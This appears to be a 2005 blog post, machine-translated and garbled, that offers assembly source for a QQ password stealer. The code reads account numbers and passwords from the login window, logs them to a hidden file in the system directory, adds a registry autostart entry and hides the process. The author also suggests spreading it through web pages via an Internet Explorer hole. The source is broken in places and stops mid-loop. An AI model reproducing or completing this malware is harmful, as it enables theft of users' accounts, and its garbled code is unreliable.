Use assembly language to pirate QQ password program (2005-04-07 18:40)
You can learn from this program to use some special feature programs for assembly ... Locking.8u8.com/hack/asmqq.rar This is a record that I have used in 98 environments a day. QQ password, only less than 7KB programming language is Win32 compilation, I use Masm8.0 classifier to deal with the latest QQ2003, QQ1230 version .... Now online, do you have a problem? Update is not used .... I have to write one, because this stuff is only a few KB written, so you can put it in the web page to use IE's cave to make people who have seen the web page .. Of course you have to change the program because it doesn't have the function of sending an email.

Document description:

Qqlog.txt: in the C:\Windows\System32 directory, the password is put in this file
QQPlus.exe: main program, put it in the system directory when using; the program writes a registry self-start entry
QQPlus.asm: source file
QQ.RC: resource file
FindStr.vbs: the script I use to verify the algorithm that does not allow repeated writes
Str.ASM: a small module that verifies whether there is a known string
readme.TXT: This also wants to explain :)

Clarified:

D: Masm32bin> Type B.BAT
ML / C / Coff msg.asm
link / subsystem: windows msg.obj qq.res

Czy in 03.06.15 .386 .Model flat, stdcall Option/include/include/include/user32.inc includelib ../lib/User32.lib include ../include/kernel32.inc includelib ../lib/kernel32.lib includDe ../include/Advapi32.inc includelib ../lib/Advapi32.lib _PROCVAR2 typedef proto: dword,: dword PROCVAR2 typedef ptr _PROCVAR2 .data szcaption db hello asm, 0 sztext db hehe, 0 szqqtitle db, 0 sztext1 db cant! Find, 0 TX DB 40 DU P (0), 0 Pass DB 16 DUP (0), 0 QQNO DB 40 DUP (0), 0 log DB C: WindowsSystem32QQLOG.TXT, 0 SZFORMAT DB% S% S, 0DH, 0AH, 0 Regpath DB SoftwareMicrosoftWindowsCurrentVersionRun, 0 Keyname DB QQPlus, 0 Exename DB QQPlus.exe, 0 HKEY DD? Allnum Dd?
@SZBuffer DB 60 DUP (0), 0 Canwrite DB 0; ------------------------------------------------------------------------------------------------ --------------- Is there a repeated record of the Find DB The same username password has existed in the file, 0 logall DB 1024 DUP (0), 0 @ HFILE1 DD? P DD 0; start The match value is set to 1, and the time matching is changed to 0 k DD 0; how many of the same characters have been found in logAll; save the first character in logall in LogAll in LogAll? J DD 0; record how many strings found in Logall to base DD 0; record logAll's address LENSTR DD 0; record the length of the matching string LEN DD 0; record file length @ SZBuffer1 DB 10 dup (0), 0 SZFORMAT1 DB% D% S, 0;
------------------------------- .const Szregister DB RegisterServiceProcessa, 0 Kerdll DB kernel32.dll, 0 .data? ? hInstance dd hWinMain dd RegisterServiceProcessA PROCVAR2 hDllInstance dd .code _isin proc invoke CreateFile, offset log, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL; OPEN_ALWAYS:??? exist open, create mov @ hFile1, eax invoke does not exist GetFileSize, @ hFile1, NULL; get file length invoke ReadFile, @ hFile1, offset logall, eax, offset allnum, NULL invoke CloseHandle, @ hFile1 invoke lstrlen, addr logall; to obtain the total length of the string mov esi, offset len mov [esi], Eax; INVOKE LSTRLEN, OFFSET @szbuffer in the len variable; get the username password to remember MOV ESI, Offset Lenstr Mov [ESI], EST LENSTR MOV [ESI], Eax; Invoke Wsprintf, Addr @ Szbuffer, Offset Szformat, Lenstr; Invoke Messagebox, Null, Offset Logall, Offset @ szbuffer, 1; * is written from the file from the file, below is comparing the Mov ESI, Offset Logall Mov Edi, Offset @szbuffer Xor EAX, EAX XOR EBX, EBX XOR ECX, ECX XOR EDX, EDX @@ bg: Movzx Eax, Byte Ptr [ESI]; Logall Movzx EBX, Byte Ptr [EDI]; @szbuffer Mov ECX, LEN .IF J> ECX JMP @@ EXIT .Endif .IF EA x == EBX .IF P == 0; find one of the first letters of Hello, the same number of INC P; P is set to 1 MOV EDX, OFFSET J MOV ECX, [EDX] MOV Q, ECX; Q .endif inc edi inc esi inc j inc k mov ecx, lenstr .if k == ecx pushad; invoke wsprintf, addr @ szBuffer1, offset szFormat1, k, offset logall; invoke MessageBox, NULL, offset @ szBuffer1, offset find, 1 POPAD; call the function EAX value to change the register Inc canwrite; writeable marking is set to 1 jmp @@ EXIXIF .ELSE .IF P == 1 MOV ECX, Q Mov J, ECX INC J MOVZX EAX , Byte PTR [ESI] Add ESI, J MOV EDI, OFFSET @SzBuffer Dec P; P Reset to 0 MOV K, 0 .Else Inc J INC ESI .Endif .Endif JMP @@ bg @@ EXIT: RET _ISIN ENDP _SAVEPASS Proc; Username Password Record in global variables Local @Hfile: Hfile local @
lpOpenbuf: OFSTRUCT invoke wsprintf, addr @ szBuffer, offset szFormat, offset qqno, offset pass; invoke MessageBox, NULL, offset @ szBuffer, offset szcaption, 1 mov qqno, NULL mov pass, NULL invoke _isin .if canwrite == 0 invoke CreateFile , offset log, GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_SYSTEM, NULL; OPEN_ALWAYS: existence is open, it does not exist create mov @ hFile, eax invoke SetFilePointer, @ hFile, 0, NULL, FILE_END invoke SetEndOfFile, @ hFile; file pointer into the end of the file invoke lstrlen, addr @szBuffer invoke _lwrite, @ hFile, addr @ szBuffer, eax .else dec canwrite; reduction numerals .endif invoke CloseHandle, @ hFile; clear the current record password to prevent repeated recording ret _SavePass endp _Findzi proc _hzi invoke GetWindowLong, _hzi, GWL_STYLE .if eax == 50012080h; QQ number recorded invoke SendMessage, _hzi, WM_GETTEXTLENGTH, 0, 0 inc eax push eax invoke SendMessage, _hzi, WM_GETTEXT, eax, offset tx; invoke MessageBox, NULL, offset tx, Offset Szcaption, 1; Mov ESI, Offset TX; MOV EDI, Offset QQNO; MyCopyStr0:; MOV Al, Byte PTR [ESI]; CMP Al, 0; JZ MyCopyStr1; MOV [EDI], Al; Inc ESI; Inc EDI; JMP MyCopyStr1: POP ECX .IF ECX> 5; Length greater than 4, QQNO! = TX MOV EDI, OFFSET QQNO MOV ESI, OFFSET TX XOR EDX, EDX .While Edx
TX MOV EDI, OFFSET Pass Mov ESI, Offset TX XOR Edx, EDX .While Edx